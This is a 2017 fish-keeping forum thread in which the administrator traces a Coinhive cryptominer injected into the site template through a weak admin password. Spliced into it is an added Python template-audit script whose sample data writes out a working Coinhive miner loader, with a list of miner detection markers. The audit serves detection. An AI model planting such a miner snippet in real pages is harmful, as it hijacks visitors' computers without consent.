Arofanatics Fish Talk Forums  

Old 13-12-2017, 06:36 PM   #21
DragonFireSG
Arofanatic
 
Join Date: Jul 2015
Posts: 312

I am free tech support for family and friends T_T

Try a netstat -a -o | grep coinhive to see the process ID.

Should be able to find the responsible process and kill it, or at least track down what is running the miner.

I actually caught on to this only after my network monitoring tools reported my own PC as a source of bitcoin mining traffic.

That said, you are definitely no stranger to computers if you have grep installed on your Windows machine!
Old 13-12-2017, 06:38 PM   #22
DragonFireSG
Arofanatic
 
Join Date: Jul 2015
Posts: 312

Quote:
Originally Posted by Alvin Koh View Post
Guys, I found the injected code and removed it.

The warnings should not appear anymore.
I will continue to investigate the cause.
I would consider the server compromised...

Probably a good time to change all passwords and rebuild the system if you can. If this was a hack - and it likely is one - who knows what other back doors have been inserted.
Old 13-12-2017, 09:21 PM   #23
satan_gal
Dragon
 
Join Date: Apr 2006
Posts: 1,714

huat ar

ok le

My IT shd stop sendin me emails to warn me liao...
Old 14-12-2017, 01:49 AM   #24
Alvin Koh

Administrator

 
Join Date: Sep 2000
Posts: 1,421

The CoinHive injection happened on the 8th Dec from examining the web server logs. The perpetrator modified an empty section of the forum template with the Coinhive miner codes via the forum admin control panel leaving a trail in the logs.

I believe the fault is mine as a weak/old password was used for my main forum account which I haven't been actively using. Other than the administration control panel, I do not see signs of forced entry via other means (shell/Database w/ differing password and credentials).

To prevent a repeat, I've changed the method of access to the Admin controls and also added an additional layer of authentication to only those who have rights.

Sorry for the trouble everyone and thanks to those who reported it.

I will re-enable the Chatroom as it was not the cause after all.
Alvin Koh is offline   Reply With Quote
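
A template audit of the kind that would surface the injection described in post #24, as an added example that is not part of the original thread: it parses exported template bodies and flags scripts loaded from hosts outside an allowlist, plus Coinhive loader strings inside inline scripts. The template names, the allowlist and the sample bodies are constructed assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

ALLOWED_SCRIPT_HOSTS = {"forum.example"}  # assumption: hypothetical allowlist
# Strings used by the Coinhive in-browser miner's loader snippet.
MINER_MARKERS = ("coinhive.min.js", "coinhive.anonymous", "coinhive.user")
SAMPLE_TEMPLATES = {  # constructed sample: template name -> exported body
    "header": '<script src="clientscript/global.js"></script>\n<div id="logo"></div>\n',
    "footer_extra":  # hypothetical name for a normally empty section
        '<script src="https://coinhive.com/lib/coinhive.min.js"></script>\n'
        "<script>\nvar miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER');\n"
        "miner.start();\n</script>\n",
}

class ScriptAudit(HTMLParser):
    """Records off-site script hosts and miner markers in inline scripts."""

    def __init__(self):
        super().__init__()
        self.findings = []  # (line_number, reason)
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            host = urlparse(dict(attrs).get("src") or "").hostname
            if host and host not in ALLOWED_SCRIPT_HOSTS:
                self.findings.append((self.getpos()[0], f"external script host {host}"))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        for marker in MINER_MARKERS if self._in_script else ():
            idx = data.lower().find(marker)
            if idx != -1:  # report the marker's own line, not the chunk start
                line = self.getpos()[0] + data.count("\n", 0, idx)
                self.findings.append((line, f"miner marker {marker}"))

def audit_templates(templates):
    """Return {template_name: [(line, reason), ...]} for templates with findings."""
    report = {}
    for name, body in templates.items():
        parser = ScriptAudit()
        parser.feed(body)
        parser.close()
        if parser.findings:
            report[name] = parser.findings
    return report
```

Calling `audit_templates(SAMPLE_TEMPLATES)` reports only the `footer_extra` template; relative script paths such as the one in `header` are treated as same-site and skipped.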
Old 14-12-2017, 03:19 AM   #25
NI KI
Arofanatic
 
Join Date: Oct 2006
Posts: 168

I can't attach photo in chatter box. Is it the cause of the "coinhive.com"?
Old 14-12-2017, 08:10 AM   #26
richardg
Arofanatic
 
Join Date: Oct 2005
Posts: 120

Quote:
Originally Posted by DragonFireSG View Post
I am free tech support for family and friends T_T

Try a netstat -a -o | grep coinhive to see the process ID.

Should be able to find the responsible process and kill it, or at least track down what is running the miner.

I actually caught on to this only after my network monitoring tools reported my own PC as a source of bitcoin mining traffic.

That said, you are definitely no stranger to computers if you have grep installed on your Windows machine!

The network connection is established every time TeamViewer is started.
The other PID belongs to killerserver.exe.
Uninstalled and reinstalled TeamViewer but it still returns.
It seems I can trap the connection to within localhost but can't get rid of the virus. Where is it hiding?
Avast and Malwarebytes freeware can't detect it.
Old 14-12-2017, 10:02 AM   #27
Ong88

Prof SK Ong
 
Join Date: Jan 2009
Posts: 10,641

Wah

My orpit no IT department but also can block AF.
Can't use wifi.

Lucky got mobile data.
__________________



Just because it's a bad idea doesn't mean it won't be a good time.
Use imgur for your photos sharing
https://play.google.com/store/apps/d...m.imgur.mobile
Old 14-12-2017, 10:39 AM   #28
richardg
Arofanatic
 
Join Date: Oct 2005
Posts: 120

Quote:
Originally Posted by richardg View Post
The network connection is established every time TeamViewer is started.
The other PID belongs to killerserver.exe.
Uninstalled and reinstalled TeamViewer but it still returns.
It seems I can trap the connection to within localhost but can't get rid of the virus. Where is it hiding?
Avast and Malwarebytes freeware can't detect it.

pls ignore
shld be false alarm
Old 14-12-2017, 11:53 AM   #29
satan_gal
Dragon
 
Join Date: Apr 2006
Posts: 1,714

Quote:
Originally Posted by NI KI View Post
I can't attach photo in chatter box. Is it the cause of the "coinhive.com"?


wad u mean?
Old 16-12-2017, 04:49 AM   #30
NI KI
Arofanatic
 
Join Date: Oct 2006
Posts: 168

having problem posting picture with IE but not Firefox
All times are GMT +9. The time now is 03:34 PM.

